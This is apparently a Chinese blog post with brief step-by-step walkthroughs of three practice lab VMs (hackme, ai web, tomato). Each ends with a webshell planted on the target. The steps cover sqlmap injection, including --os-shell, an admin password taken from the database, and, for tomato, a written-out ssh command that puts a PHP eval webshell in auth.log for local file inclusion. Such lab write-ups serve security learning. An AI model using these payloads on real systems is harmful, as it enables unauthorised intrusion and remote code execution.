注:所有靶机均只做到连接木马,并未提权寻找flag,问就是不会o(╥﹏╥)o
hackme靶机
1.导入靶机,查看其网段,使用端口扫描工具(御剑2014)进行扫描,获取端口后进入
2.注册一个账户登录
3.随机输入,点击search,抓包,在搜索框后加 * ,使用 sqlmap 注入
4.获取数据库,表,数据
5.猜测 superadmin 为管理员用户,解码其密码
6.登录并上传木马
7.访问上传木马
ai web 靶机
1.打开靶机,扫描端口
2.进入页面,发现没有可用数据,扫描目录
3.查看 robots.txt
4.依次查看,发现第一个目录返回403,扫描目录,获取绝对路径,第二个目录不可用,但去掉upload可用
5.输入不同id,数据变化,存在注入,提交抓包,并在提交框参数后加 *
6.获取 --os-shell 权限
获取权限需要给一个可以写入的文件,从 info.php 中可以得知绝对路径,拼接从robots.txt 中获取的 uploads 的路径(既然是下载路径,那么一定可写)
7.写入木马,$前加 \ ,防止被注释
8.连接木马
tomato 靶机
1.打开靶机扫描端口,进入页面
2.发现无可用数据,扫描目录
3.发现无目录,则可能是端口不同,使用 nmap 扫描,发现有 8888 和 2211 端口,同时使用 dirb 扫描目录
4.访问http://192.168.32.153/antibot_image/antibots/info.php,发现其存在文件包含漏洞
5.之前扫描出来 2211 远程连接端口,尝试连接,然后访问日志/var/log/auth.log,发现无论是否连接成功,日志中都会出现用户名及其操作
6.将一句话木马作为用户名使用 ssh 连接靶机 ip
注:这里 kali 出问题,用户名内不能有特殊字符,随便切换一个 linux 主机连接即可
ssh '<?php eval($_POST[1]); ?>'@192.168.32.153 -p 2211
7.连接木马
标签:tomato,端口,目录,扫描,连接,木马,靶机,aiweb,hackme From: https://blog.csdn.net/l_OMl_l/article/details/140778530